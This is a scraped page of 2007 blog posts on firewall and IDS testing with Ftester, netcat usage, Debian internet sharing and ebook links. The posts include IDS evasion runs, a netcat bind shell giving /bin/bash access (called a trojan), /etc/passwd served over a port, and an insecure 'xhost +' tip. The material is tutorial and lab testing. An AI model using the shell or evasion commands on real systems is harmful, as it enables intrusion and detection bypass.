create a real connection with the proper SYN,SYN-ACK,ACK handshake before
sending them with the correct sequence numbers, the ftestd process will send the
correct replies. However when simulating the connection if we are spoofing the
source address the stack of the destination host will reply to our spoofed
packets and the real host that we'are spoofing will consequently reset the
connection since it hasn't started it. So we have to do two things, hiding the
stack response to the spoofed host and to the firewall and make sure that ftestd
reply will traverse the firewall by not reaching the spoofed host. Hiding the
stack response could be done by setting a very low default TTL in
/proc/sys/net/ipv4/ip_default_ttl (Linux only). Hiding to the spoofed host
ftestd reply is done by setting its TTL to a low value equal to the hop delay
between ftestd and the firewall. The -s flag for ftest and the -c flag for
ftestd must be tuned for this mode, for example use ./ftestd -c 0:3 for
temporarly setting default stack ttl to 0 and ftestd reply ttl to 3, the
ip_default_ttl will be restored when a stop_signal is received.

The so called 'connection spoofing mode' can be activated with the 'connect='
prefix, let's use this mode:

- ftest.conf -
# simulating a ssh connection
connect=192.168.0.10:1025:10.1.7.1:22:AP:TCP:0
# checking unmatched RST packets
192.168.0.10:1025:10.1.7.1:23:UR:TCP:0
# checking matched RST packets
connect=192.168.0.10:1025:10.1.7.1:23:UR:TCP:0
stop_signal=192.168.0.10:1025:10.1.7.1:80:S:TCP:0

and again:

[root@hostb]# ./ftestd -i eth0 -c 0:3 -v

[root@hosta]# ./ftest -f ftest.conf -v -d 0.01 -s 1


Sent Syn Probe => 192.168.0.10:1025 > 10.1.7.1:22 S TCP
Sleeping for 1 seconds
Sent Ack Reply => 192.168.0.10:1025 > 10.1.7.1:22 A TCP
3 - 192.168.0.10:1025 > 10.1.7.1:22 AP TCP 0
5 - 192.168.0.10:1025 > 10.1.7.1:23 UR TCP 0
Sent Syn Probe => 192.168.0.10:1025 > 10.1.7.1:23 S TCP
Sleeping for 1 seconds
Sent Ack Reply => 192.168.0.10:1025 > 10.1.7.1:23 A TCP
8 - 192.168.0.10:1025 > 10.1.7.1:23 UR TCP 0
Stop packet => 192.168.0.10:1025 > 10.1.7.1:80 S TCP

note that this time ftest is configured to wait 1 second for ftestd replies.

It's useful to see what traffic we are generating using tcpdump:

[root@hostb]# tcpdump -n -v -i eth0


# the first connection
15:16:04.969929 192.168.0.10.1025 > 10.1.7.1.22: S [tcp sum ok] 18679:18687(8) win 65535 (DF) (ttl 200, id 1, len 48)
15:16:04.973880 10.1.7.1.22 > 192.168.0.10.1025: S [tcp sum ok] 19703:19703(0) ack 18687 win 65535 (DF) [tos 0x10]  (ttl 200, id 1, len 40)
15:16:05.991877 192.168.0.10.1025 > 10.1.7.1.22: . [tcp sum ok] ack 1 win 65535 (DF) (ttl 200, id 2, len 40)
15:16:06.001927 192.168.0.10.1025 > 10.1.7.1.22: P [tcp sum ok] 1:16(15) ack 1 win 65535 (DF) (ttl 200, id 3, len 55)
15:16:06.012034 192.168.0.10.1025 > 10.1.7.1.22: P [tcp sum ok] 16:21(5) ack 1 win 65535 (DF) (ttl 200, id 4, len 45)
15:16:06.014798 10.1.7.1.22 > 192.168.0.10.1025: . [tcp sum ok] ack 21 win 65535 (DF) [tos 0x10]  (ttl 200, id 2, len 40)

# the unmatched RST
15:16:06.023391 192.168.0.10.1025 > 10.1.7.1.23: R [tcp sum ok] 0:15(15) win 65535 urg 0 [RST ftestertcpprobe] (DF) (ttl 200, id 5, len 55)

# the second connection
15:16:06.032223 192.168.0.10.1025 > 10.1.7.1.23: S [tcp sum ok] 63848:63856(8) win 65535 (DF) (ttl 200, id 6, len 48)
15:16:06.034946 10.1.7.1.23 > 192.168.0.10.1025: S [tcp sum ok] 64872:64872(0) ack 63856 win 65535 (DF) [tos 0x10]  (ttl 200, id 1, len 40)
15:16:07.051963 192.168.0.10.1025 > 10.1.7.1.23: . [tcp sum ok] ack 1 win 65535 (DF) (ttl 200, id 7, len 40)
# the correct RST 
15:16:07.061863 192.168.0.10.1025 > 10.1.7.1.23: R [tcp sum ok] 63856:63871(15) win 65535 urg 0 [RST ftestertcpprobe] (DF) (ttl 200, id 8, len 55)
15:16:07.072021 192.168.0.10.1025 > 10.1.7.1.23: R [tcp sum ok] 63871:63876(5) win 65535 urg 0 [RST ackme] (DF) (ttl 200, id 9, len 45)
15:16:07.074616 10.1.7.1.23 > 192.168.0.10.1025: . [tcp sum ok] ack 21 win 65535 (DF) [tos 0x10]  (ttl 200, id 2, len 40)

# the stop_signal 
15:16:07.083321 192.168.0.10.1025 > 10.1.7.1.80: S [tcp sum ok] 0:11(11) win 65535 (DF) (ttl 200, id 10, len 51)

again here's the logs comparison:

[root@hostb]# ./freport ftest.log ftestd.log


Authorized packets:
-------------------

3 - 192.168.0.10:1025 > 10.1.7.1:22 PA TCP 0
8 - 192.168.0.10:1025 > 10.1.7.1:23 UR TCP 0
10 - 192.168.0.10:1025 > 10.1.7.1:80 S TCP 0

Modified packets (probably NAT):
--------------------------------

  >>>>>>>>

Filtered or dropped packets:
----------------------------

5 - 192.168.0.10:1025 > 10.1.7.1:23 UR TCP 0

the first RST has been dropped this confirm that we'are probably dealing with a
stateful inspection firewall.

If more than one packet is specified with the 'connect=' prefix and the same
connection parameters (source address/port, destination address/port) the
-r/-F flags must be used to correctly close (with a RST or a FIN handshake) each
connections, otherwise, if the firewall is performing sequence numbers tracking,
connections other than the first will be blocked.

The IDS testing option permits the injection of arbitrary packets with custom
payload, using a payload that is supposed to trigger an IDS alert we can test
IDS visibility on the network and it's ability of sniffing fragmented/segmented
packets. A number of common IDS evasion techniques are also implemented for
activation during packets injection. The configuration file for this mode will
use the standard syntax with the 'ids=' and 'ids-conn=' prefixes, additionally
ftest can directly use a snort (http://www.snort.org) rule definition file
(check documentation for currently supported keywords). Here's a syntax example:

- ftest.conf -
ids=192.168.0.10:1025:10.1.7.1:25:S:TCP:0:VRFY
ids=192.168.0.10::10.1.7.1:::ICMP:3:5:+++ath
ids-conn=192.168.0.10:23:10.1.7.1:1025:PA:TCP:0:to su root
ids-conn=192.168.0.10:1025:10.1.7.1:80:PA:TCP:0:cmd.exe
ids-conn=192.168.0.10:1026:10.1.7.1:80:PA:TCP:0:ftp.exe
insert /etc/snort/exploit.rules 192.168.0.10 10.1.7.1 0
insert-conn /etc/snort/web-misc.rules 192.168.0.10 10.1.7.1 0

The '-conn' options works just like the 'connect' option, this is useful if the
IDS is performing stateful inspection, the ftestd presence is needed when using
this mode otherwise since we are only testing the IDS the sniffer is not
required.

The 'insert' option take 4 arguments, the definition file, the source address,
the destination address and the type of service.

Let's use this feature to test snort ability in eluding evasion techniques,
we'll use a common alert and we'll assume that snort is performing stateful
inspection discarding unmatched traffic.

Step 1:

The configuration file:

- ftest.conf -
ids-conn=192.168.0.1:1025:10.7.0.1:80:PA:TCP:0:cmd.exe

Step 2:

Let's start snort on our sensor:

[root@ids1] snort -A full -c /etc/snort/snort.conf -D -b -d -i eth0 -l /var/log \
-s -z

Let's start as root ftestd on Host B:

[root@hostb]# ./ftestd -i eth0 -c 0:3 -v

Let's injects the packets as root on Host A:

[root@hosta]# ./ftest -f ftest.conf -v -d 0.01 -s 1 -F


Sent Syn Probe => 192.168.0.10:1025 > 10.1.7.1:80 S TCP
Sleeping for 1 seconds
Sent Ack Reply => 192.168.0.10:1025 > 10.1.7.1:80 A TCP
6 - 192.168.0.10:1025 > 10.1.7.1:80 PA TCP 0 "cmd.exe"

Immidiately snort alerts us with the following syslog message (notice that snort
also warn us about ftest signature in the SYN packet):


Jun  5 16:25:13 lcars snort[4467]: [111:5:1] spp_stream4: DATA ON SYN detection [Classification: Unknown Traffic] [Priority: 3]: {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:25:14 lcars snort[4467]: [1:1002:2] WEB-IIS cmd.exe access [Classification: Web Application Attack] [Priority: 1]: {TCP} 192.168.0.10:1025 -> 10.1.7.1:80

We can repeat the process using some dirty tricks like fragmentation and evasion
techniques (see documentation for a detailed description):

[root@hosta]# ./ftest -f ftest.conf -v -d 0.01 -s 1 -F -g 2
[root@hosta]# ./ftest -f ftest.conf -v -d 0.01 -s 1 -F -e stream -p 3
[root@hosta]# ./ftest -f ftest.conf -v -d 0.01 -s 1 -F -e stream -p 1b
[root@hosta]# ./ftest -f ftest.conf -v -d 0.01 -s 1 -F -e desync1

and so on...

Since snort rocks it identifies correctly the triggering payload each time:


Jun  5 16:29:32 lcars snort[4467]: [111:5:1] spp_stream4: DATA ON SYN detection {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:29:34 lcars snort[4467]: [1:1002:2] WEB-IIS cmd.exe access [Classification: Web Application Attack] [Priority: 1]: {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:30:16 lcars snort[4467]: [111:5:1] spp_stream4: DATA ON SYN detection {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:30:18 lcars snort[4467]: [1:1002:2] WEB-IIS cmd.exe access [Classification: Web Application Attack] [Priority: 1]: {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:30:40 lcars snort[4467]: [111:5:1] spp_stream4: DATA ON SYN detection {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:30:42 lcars snort[4467]: [1:1002:2] WEB-IIS cmd.exe access [Classification: Web Application Attack] [Priority: 1]: {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:31:00 lcars snort[4467]: [111:5:1] spp_stream4: DATA ON SYN detection {TCP} 192.168.0.10:1025 -> 10.1.7.1:80
Jun  5 16:31:02 lcars snort[4467]: [1:1002:2] WEB-IIS cmd.exe access [Classification: Web Application Attack] [Priority: 1]: {TCP} 192.168.0.10:1025 -> 10.1.7.1:80

The generated log will help in clarifying what has been sent:


- ftest.log -
# ftest started on Wed Jun  5 16:25:13 CEST 2002
IDS mode >> 3 - 192.168.0.10:1025 > 10.1.7.1:80 "cmd.exe" PA TCP 0
# ftest stopped on Wed Jun  5 16:25:15 CEST 2002
# ftest started on Wed Jun  5 16:29:32 CEST 2002
IDS mode >> 3 - 192.168.0.10:1025 > 10.1.7.1:80 "cmd.exe" PA TCP 0
# ftest stopped on Wed Jun  5 16:29:35 CEST 2002
# ftest started on Wed Jun  5 16:30:16 CEST 2002
IDS mode >> 3 - 192.168.0.10:1025 > 10.1.7.1:80 "cm" PA TCP 0
IDS mode >> 4 - 192.168.0.10:1025 > 10.1.7.1:80 "d." PA TCP 0
IDS mode >> 5 - 192.168.0.10:1025 > 10.1.7.1:80 "exe" PA TCP 0
# ftest stopped on Wed Jun  5 16:30:18 CEST 2002
# ftest started on Wed Jun  5 16:30:40 CEST 2002
IDS mode >> 3 - 192.168.0.10:1025 > 10.1.7.1:80 "c" PA TCP 0
IDS mode >> 4 - 192.168.0.10:1025 > 10.1.7.1:80 "m" PA TCP 0
IDS mode >> 5 - 192.168.0.10:1025 > 10.1.7.1:80 "d" PA TCP 0
IDS mode >> 6 - 192.168.0.10:1025 > 10.1.7.1:80 "." PA TCP 0
IDS mode >> 7 - 192.168.0.10:1025 > 10.1.7.1:80 "e" PA TCP 0
IDS mode >> 8 - 192.168.0.10:1025 > 10.1.7.1:80 "x" PA TCP 0
IDS mode >> 9 - 192.168.0.10:1025 > 10.1.7.1:80 "e" PA TCP 0
# ftest stopped on Wed Jun  5 16:30:42 CEST 2002
# ftest started on Wed Jun  5 16:31:00 CEST 2002
IDS mode >> 3 - 192.168.0.10:1025 > 10.1.7.1:80 "cmd" PA TCP 0
IDS mode >> 4 - 192.168.0.10:1025 > 10.1.7.1:80 "" S TCP 0 EVASION PACKET!
IDS mode >> 5 - 192.168.0.10:1025 > 10.1.7.1:80 ".exe" PA TCP 0
# ftest stopped on Wed Jun  5 16:31:02 CEST 2002

;)

Mário Miranda de Magalhães

Ftester - Ferramenta de Teste de Firewall e IDS

2007-02-21T12:54:00.000-02:00

Descrição:

The Firewall Tester (FTester) é uma ferramenta criada para testar regras de filtragem firewalls e as capacidades Intrusion Detection System (IDS).
A ferramenta consiste em 2 scripts perl, um injetor de pacotes (ftest) e um sniffer passivo (listening sniffer - ftestd).

O primeiro script injeta pacotes customizados, definidos em ftest.conf, com uma assinatura neles enquanto o sniffer passivo procura por essas assinaturas. Ambos scripts escrever um arquivo de log igual em sua estrutura. Um diff dos dois arquivos log criados (ftest.log e ftestd.log) mostram os pacotes que não foram aptos a encontrar o sniffer passivo, dropados, pelas regras do filtro de pacotes, se os dois scripts estiverem sendo rodados em lados diferentes do firewall. As inspeções de stateful firewalls são feitas com a opções "connection spoofing" ativada. Há também o script chamada freport para automaticamente lidar com os logs.

Mas este não é um processo automatizado, o ftest.conf deve ser modificado para cada diferente teste / ambiente. Exemplos e regras estão inclusas no arquivo de configuração.

A função de teste de IDS pode ser usada tanto com o ftest apenas ou com a ajuda adicional do ftestd para funcionar com stateful inspection IDS, ftest também pode usar técnicas comuns de evasão de IDS. Ao invés de usar sintaxes de configuração o script pode buscar nos arquivos de configuração do seu IDS. (Testei apenas com o snort).

Características:

firewall testing
IDS testing
Simulação de conexões reais TCP para inspecionar firewalls e IDS.
Fragmentação de IP / Fragmentação de TCP
Técnicas de evasão de IDS

Requerimentos:

Os seguintes módulos do perl (e o perl inclusive hehehe) são requeridos: Net::RawIP, Net::PcapUtils, NetPacke

Download:

O release mais recente é o ftester-1.0.tar.gz (pelo menos enquanto escrevo esta dica)E todos os releases estão disponíveis em http://dev.inversepath.com/ftester

Documentação:

Man page (ftester.8) - http://dev.inversepath.com/ftester/ftester.html

README - http://dev.inversepath.com/ftester/README

TISC Insight, Volume 5, Issue 6: Testing firewalls and IDS with Ftester - http://www.tisc-insight.com/newsletters/56.html

Espero que ajude alguém.

Abraços.

Mário Miranda de Magalhães

Using the netcat

2007-02-13T11:45:00.000-02:00

Olá a Todos,
como já fiz um artigo em português sobre o uso do netcat. Agora vou colocar uma versão em inglês.

====== English Translation ======

Hello Guys,

As I've already done an article about how to use the netcat in protuguese. Now I'll release a english "lite" version of that article.

Let's get started

It's important to remember that commands e syntax of linux shell can be mixed with the netcat, such like using pipes, ( | ), <, >, << and >>.

Using NetCat

Introduction
NetCat is the "TCP/IP swiss army knife" available since 1996. Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts."

Usage

Lets start with man pages that shows me the options I can use.

The options are as follows:

-4 Forces nc to use IPv4 addresses only.

-6 Forces nc to use IPv6 addresses only.

-D Enable debugging on the socket.

-d Do not attempt to read from stdin.

-h Prints out nc help.

-i interval
Specifies a delay time interval between lines of text sent and
received. Also causes a delay time between connections to multi-
ple ports.

-k Forces nc to stay listening for another connection after its cur-
rent connection is completed. It is an error to use this option
without the -l option.

-l Used to specify that nc should listen for an incoming connection
rather than initiate a connection to a remote host. It is an er-
ror to use this option in conjunction with the -p, -s, or -z op-
tions. Additionally, any timeouts specified with the -w option
are ignored.

-n Do not do any DNS or service lookups on any specified addresses,
hostnames or ports.

-P proxy_username
Specifies a username to present to a proxy server that requires
authentication. If no username is specified then authentication
will not be attempted. Proxy authentication is only supported
for HTTP CONNECT proxies at present.

-p source_port
Specifies the source port nc should use, subject to privilege re-
strictions and availability. It is an error to use this option
in conjunction with the -l option.

-r Specifies that source and/or destination ports should be chosen
randomly instead of sequentially within a range or in the order
that the system assigns them.

-S Enables the RFC 2385 TCP MD5 signature option.

-s source_ip_address
Specifies the IP of the interface which is used to send the pack-
ets. It is an error to use this option in conjunction with the
-l option.

-T ToS Specifies IP Type of Service (ToS) for the connection. Valid
values are the tokens ``lowdelay'', ``throughput'',
``reliability'', or an 8-bit hexadecimal value preceded by
``0x''.

-t Causes nc to send RFC 854 DON'T and WON'T responses to RFC 854 DO
and WILL requests. This makes it possible to use nc to script
telnet sessions.

-U Specifies to use Unix Domain Sockets.

-u Use UDP instead of the default option of TCP.

-v Have nc give more verbose output.

-w timeout
If a connection and stdin are idle for more than timeout seconds,
then the connection is silently closed. The -w flag has no ef-
fect on the -l option, i.e. nc will listen forever for a connec-
tion, with or without the -w flag. The default is no timeout.

-X proxy_protocol
Requests that nc should use the specified protocol when talking
to the proxy server. Supported protocols are ``4'' (SOCKS v.4),
``5'' (SOCKS v.5) and ``connect'' (HTTPS proxy). If the protocol
is not specified, SOCKS version 5 is used.

-x proxy_address[:port]
Requests that nc should connect to hostname using a proxy at
proxy_address and port. If port is not specified, the well-known
port for the proxy protocol is used (1080 for SOCKS, 3128 for
HTTPS).

-z Specifies that nc should just scan for listening daemons, without
sending any data to them. It is an error to use this option in
conjunction with the -l option.

hostname can be a numerical IP address or a symbolic hostname (unless the
-n option is given). In general, a hostname must be specified, unless
the -l option is given (in which case the local host is used).

port[s] can be single integers or ranges. Ranges are in the form nn-mm.
In general, a destination port must be specified, unless the -U option is
given (in which case a socket must be specified).

CLIENT/SERVER MODEL
It is quite simple to build a very basic client/server model using nc.
On one console, start nc listening on a specific port for a connection.
For example:

$ nc -l 1234

nc is now listening on port 1234 for a connection. On a second console
(or a second machine), connect to the machine and port being listened on:

$ nc 127.0.0.1 1234

There should now be a connection between the ports. Anything typed at
the second console will be concatenated to the first, and vice-versa.
After the connection has been set up, nc does not really care which side
is being used as a `server' and which side is being used as a `client'.
The connection may be terminated using an EOF (`^D').

DATA TRANSFER
The example in the previous section can be expanded to build a basic data
transfer model. Any information input into one end of the connection
will be output to the other end, and input and output can be easily cap-
tured in order to emulate file transfer.

Start by using nc to listen on a specific port, with output captured into
a file:

$ nc -l 1234 > filename.out

Using a second machine, connect to the listening nc process, feeding it
the file which is to be transferred:

$ nc host.example.com 1234 < filename.in

After the file has been transferred, the connection will close automati-
cally.

TALKING TO SERVERS
It is sometimes useful to talk to servers ``by hand'' rather than through
a user interface. It can aid in troubleshooting, when it might be neces-
sary to verify what data a server is sending in response to commands is-
sued by the client. For example, to retrieve the home page of a web
site:

$ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80

Note that this also displays the headers sent by the web server. They
can be filtered, using a tool such as sed(1), if necessary.

More complicated examples can be built up when the user knows the format
of requests required by the server. As another example, an email may be
submitted to an SMTP server using:

$ nc localhost 25 << EOF
HELO host.example.com
MAIL FROM:
RCPT TO:
DATA
Body of email.
.
QUIT
EOF

PORT SCANNING
It may be useful to know which ports are open and running services on a
target machine. The -z flag can be used to tell nc to report open ports,
rather than initiate a connection. For example:

$ nc -z host.example.com 20-30
Connection to host.example.com 22 port [tcp/ssh] succeeded!
Connection to host.example.com 25 port [tcp/smtp] succeeded!

The port range was specified to limit the search to ports 20 - 30.

Alternatively, it might be useful to know which server software is run-
ning, and which versions. This information is often contained within the
greeting banners. In order to retrieve these, it is necessary to first
make a connection, and then break the connection when the banner has been
retrieved. This can be accomplished by specifying a small timeout with
the -w flag, or perhaps by issuing a "QUIT" command to the server:

$ echo "QUIT" | nc host.example.com 20-30
SSH-1.99-OpenSSH_3.6.1p2
Protocol mismatch.
220 host.example.com IMS SMTP Receiver Version 0.84 Ready

MAKE A REVERSE CONECTION AND GIVING A SHELL ACCESS [ Trojan ]

We'll put a port X in listenning state, and we will redirect de output data
to a shell (/bin/bash). Then when someone connects through this port he will
gain a shell control of the machine. It work very similar to a trojan horse.

$ nc -l -e /bin/bash -p 2332

EXAMPLES
Open a TCP connection to port 42 of host.example.com, using port 31337 as
the source port, with a timeout of 5 seconds:

$ nc -p 31337 -w 5 host.example.com 42

Open a UDP connection to port 53 of host.example.com:

$ nc -u host.example.com 53

Open a TCP connection to port 42 of host.example.com using 10.1.2.3 as
the IP for the local end of the connection:

$ nc -s 10.1.2.3 host.example.com 42

Create and listen on a Unix Domain Socket:

$ nc -lU /var/tmp/dsocket

Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4,
port 8080. This example could also be used by ssh(1); see the
ProxyCommand directive in ssh_config(5) for more information.

$ nc -x10.2.3.4:8080 -Xconnect host.example.com 42

The same example again, this time enabling proxy authentication with
username ``ruser'' if the proxy requires it:

$ nc -x10.2.3.4:8080 -Xconnect -Pruser host.example.com 42

While the -l (lowercase L) tells nc to listen to a port, -L (capital L) will
restart Netcat with the same command line when the connection is terminated.
This way you can connect over and over to the same Netcat process, although its
behavior may be a bit different (eg. if the server is waiting to send a file to
any client that connects, only the first connection will actually send the
file.)

If you don't want to see a DOS box remain open while running a server, add the
-d switch to tell nc to detach itself, and then close the DOS window.

To work with UDP, use the -u switch.

To keep a copy of the whole conversation between server and client in a hex
dump file, use the -o switch, eg. -o mylogfile.bin

If you specify a target host and optional port in listen mode, netcat will
accept an inbound connection only from that host and if you specify one, only
from that foreign source port.

As a replacement to Telnet
nc smtp.acme.com 25

> 220 smtp.acme.com ESMTP Postfix

quit

> 221 Bye

To scan a range of ports on a server:
nc -z -r -v www.acme.com 70-80

To open a port on a server, and send a file's content to a client:
On the server:
cat /etc/passwd | nc -l -p 1234 (or nc -l -p 1234 < /etc/passwd)

On the client: nc remotehost.acme.com 1234 > passwd.txt, followed by CTRL-C to
end the connection.

To retrieve the home page of a web site:
nc -v www.website.com 80 < get.txt

where get.txt contains GET / HTTP/1.0 followed by a CRLF since this is what a
web server expects to send a web page to a browser.

Poor man's web server
On the server: nc -L -p 1234 < /home/drk/sometext.txt

On the client, point your browser to http://www.acme.com:1234

Hope I helped someone

Best regards.

Mário Miranda de Magalhães

Livros e Tutoriais

2007-02-12T09:35:00.000-02:00

Como às vezes eu procuro livros e tutoriais para download e não acho, resolvi colocar aqui para compartilhar com os que visitam meu blog estes endereços.

São livros de TI e outras coisas como "engenharia marítima".

Seguem os links.

http://worldclassbooks.blogspot.com ( Graças à ajuda de JITENDER KUMAR GARG )
http://kitab-ghar.blogspot.com
http://shahidzain.blogspot.com
http://mahek-kutubkhana.blogspot.com
http://shahid-tutesworld.blogspot.com
http://arbizaa-softwareworld.blogspot.com
http://alltutes.blogspot.com
http://rapidshare-library.blogspot.com
http://www.mzworld.com
http://www.mzworld.com/wp/ebooks

Espero que ajude alguém.

P.S: A partir de hoje colocarei posts em inglês, mas não deixarei de escrever em português, só irei traduzi-los, pois tem pessoas de outros países interessadas em alguens dos meus post.

Sintam-se livres para tecer qualquer comentário e reclamação.

====== English Translation ======

As times from times I need some books to studie, and I have to download them and finding it sux. I'll post here some links with lots of tutorials and books about a lot of things. Most of them are of IT but also have stuff like "marine engineering".

Below the links:

http://worldclassbooks.blogspot.com (Thanks to JITENDER KUMAR GARG)
http://kitab-ghar.blogspot.com
http://shahidzain.blogspot.com
http://mahek-kutubkhana.blogspot.com
http://shahid-tutesworld.blogspot.com
http://arbizaa-softwareworld.blogspot.com
http://alltutes.blogspot.com
http://rapidshare-library.blogspot.com
http://www.mzworld.com
http://www.mzworld.com/wp/ebooks

Hope I helped.

P.S: I'll from now make posts both portuguese and english, 'cause some guys around the world are interest in this blog content.
Feel free to drop me a line and say what you want and what you don't like here.

[]'s to all

Compartilhando Internet no Debian

2007-02-09T17:07:00.000-02:00

Distro: Debian 3.1

Conteúdo

1 Prefácio

2 Requerimentos

3 Criando uma rede

4 Configurando a segunda estação

5 Criando um Script para compartilhamento de internet

6 Colocando na inicialização da máquina

7 Instalando um Servidor DNS

Prefácio

Muitas vezes temos em casa mais de um computador e nossa conexão nao permite o compartilhamento
ou até mesmo voce tem uma conexão de Dial-up e gostaria de dividir ela com outro computador,
entao se você tem um desses casos, este tutorial pode ser util para você.

Requerimentos

Se você vai compartilhar a adsl com outro micro, voce irá precisar de:

Uma Placa de rede 10/100
Um Hub/Swithc ou Cabo crossover ( no caso do cabo cross, so pode usar com mais uma maquina )
Uma conexão com a internet

Criando uma rede

Bom, para compartilhar a internet, iremos precisar inicialmente de criar uma rede, se voce
for compartilhar a internet, e sua conexao for adsl, então mantenha a seguinte estrutura

Placa de rede 1 ( eth0 ) --> conexão com a internet
Placa de rede 2 ( eth1 ) --> conexao de Rede Local

Caso voce for compartilhar uma conexao dial-up então sua placa de rede será quem fará a conexão da
rede local

Inicialmente voce já deve ter um ip configurado para comunicaçao com o seu modem, para verificar
qual é o seu ip, abra um terminal (xterm, konsole, gnome-terminal... ) e digite o seguinte comando

/sbin/ifconfig

a saida do comando será algo semelhante ao seguinte:

eth0       Encapsulamento do Link: Ethernet  Endereço de HW 00:E0:7D:A2:EF:3A
         inet end.: 200.250.241.209  Bcast:255.255.255.255  Masc:255.255.255.0
         endereço inet6: fe80::2e0:7dff:fea2:ef3a/64 Escopo:Link
         UP BROADCASTRUNNING MULTICAST  MTU:1500  Métrica:1
         RX packets:5304553 errors:1 dropped:0 overruns:0 frame:0
         TX packets:3404353 errors:0 dropped:0 overruns:16 carrier:0
         colisões:0 txqueuelen:1000
         RX bytes:1683936055 (1.5 GiB)  TX bytes:3471646904 (3.2 GiB)
         IRQ:5 Endereço de E/S:0xc400

lo         Encapsulamento do Link: Loopback Local
         inet end.: 127.0.0.1  Masc:255.0.0.0
         endereço inet6: ::1/128 Escopo:Máquina
         UP LOOPBACKRUNNING  MTU:16436  Métrica:1
         RX packets:1245431 errors:0 dropped:0 overruns:0 frame:0
         TX packets:1245431 errors:0 dropped:0 overruns:0 carrier:0
         colisões:0 txqueuelen:0
         RX bytes:297554646 (283.7 MiB)  TX bytes:297554646 (283.7 MiB)

Entao neste caso podemos ver que o meu ip é o ip 200.250.241.209, no meu caso, eu tenho uma
conexão da net ( virtua ), esse ip é pego automaticamente por um cliente dhcp

no seu caso, este ip pode variar, pode ser uma rede exclusiva como 192.168.10 ou outra coisa qq

Bom, se a sua rede for 200.xxx.xxx.xxx voce pode usar qualquer ip para sua rede interna
agora, se sua rede for 192.168.10.0 voce teria que usar uma rede 192.168.1.0 para separar
as duas

Entao, primeiramente vamos configurar a rede, no debian, voce pode abrir o seguinte arquivo:

/etc/network/interfaces

Esse arquivo será semelhante ao seguinte, no caso de voce pegar a conexao por dhcp

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet dhcp



Eu preciso agora, que voce abra o arquivo /etc/network/interfaces com o usuario root
para isso, voce pode usar os seguintes comando no terminal

xhost +
su root

agora com isso, voce pode abrir pelo terminal o seu editor de texto favorito, e mandar
abrir o arquivo /etc/network/interfaces

( se voce vai usar uma placa de rede apenas, no caso de compartilhar dial up, troque o eth1 por
eth0 na configuracao abaixo )

e acrescente ao fim do arquivo as seguintes configuracoes

auto eth1
iface eth1 inet static
       address 192.168.20.1
       netmask 255.255.255.0
       broadcast 192.168.20.255
       network 192.168.20.0

com isso, voce ja pode salvar o arquivo e fechar o editor de texto
para carregar essas configuracoes execute os seguintes comandos:

/etc/init.d/networking stop
/etc/init.d/networking start

Configurando a segunda estação

Bom, se sua segunda estação for debian, você pode usar o mesmo esquema pra configurar,
caso seja outra distro, ou seja windows, voce tem que verificar, onde ficam as configurações
para sua versão, oque voce precisa é que a estação tenha os seguintes dados

ip:                      192.168.20.2
mascara de rede:         255.255.255.0
dns:                     192.168.20.1
gateway:                 192.168.20.1

com isso configurado, tente dar o seguinte comando da estação que voce configurou agora

ping 192.168.20.1

a saida do comando deverá ser algo semelhante ao abaixo

PING 192.168.20.1 (192.168.20.1) 56(84) bytes of data.
64 bytes from 192.168.20.1: icmp_seq=1 ttl=128 time=2.70 ms



se der algo como timeout, ou outro tipo de erro, entao sua conexao nao esta funcionando
se a saida for a acima, entao está tudo ok, e podemos passa para o proximo passo

Criando um Script para compartilhamento de internet

Bom, agora, precisamos montar o script para compartilhar a internet, entao abra um edito de texto
qualquer, e acrescente os seguintes dados dentro


 #!/bin/bash

 echo "1" > /proc/sys/net/ipv4/ip_forward

 # Limpando as tabelas
 iptables -F
 iptables -t nat -F
 iptables -t mangle -F

 # Macarando conexões da rede
 # se sua conexao estiver na interface ppp0 basta trocar o eth0 por ppp0
 # a interface ppp0 é usada tb em dial-up, entao, neste caso, troque o eth0
 # por ppp0

 iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ok, agora, pode salvar, e fechar o editor de texto

Colocando na inicialização da máquina

Com o úsuario root, você ira mover este arquivo para o diretorio /etc/init.d/
entao supondo que voce chamou o arquivo de compartilhamento, voce irá executar o
seguinte comando

mv compartilhamento /etc/init.d/

Feito isso, agora temos de dar permissao de execução ao arquivo, entao use o comando abaixo:

chmod +x /etc/init.d/compartilhamento

Agora execute o arquivo digitando:

/etc/init.d/compartilhamento

Feito isso, agora temos que criar uma chamada para ele na inicialização, va ate o diretorio
/etc/rc2.d usando o seguinte comando

cd /etc/rc2.d

e use o seguinte comando para criar a chamada

ln -s /etc/init.d/compartilhamento /etc/rc2.d/S99compartilhamento

Instalando um Servidor DNS

Bom, para que o nosso servidor de nomes ( DNS ) possa ser a nossa maquina, precisamos
instalar um servidor de dns nela, nesse caso usaremos o bind9, selecione pelo synaptic, ou
instale usando o apt

apt-get install bind9

A configuração padrão da instalação, já libera ele pra resolver nomes, então com isso
podemos mandar um ping da estação

ping www.uol.com.br

A saida deverá ser semelhante a abaixo

PING www.uol.com.br (200.221.2.45): 56 data bytes
64 bytes from 200.221.2.45: icmp_seq=0 ttl=55 time=10.4 ms

Pronto, você ja tem uma internet compartilhada, divirta-se

Retirado de http://www.debianfordummies.org/wiki/index.php/Compartilhando_Internet_no_linux"

Implementando um firewall com layer 7

2007-02-09T16:52:00.000-02:00

Prefacio
Tenho percebido ultimamente uma série de pessoas querendo fazer bloqueios de msn, p2p como o emule o kazaa, entre outras softwares, entao uma solucao para esta questao é usar o modulo layer7 no kernel, junto com o iptables

Dependencias
Como dependencias para trabalharmos com o layer7 temos as seguintes dependencias kernel 2.6.14
iptables 1.3.4
gcc
make
libncurses5-dev
l7-patchs
l7-protocols
O kernel e o iptables terao de ser compilados, pois temos de aplicar patchs para isso

Kernel
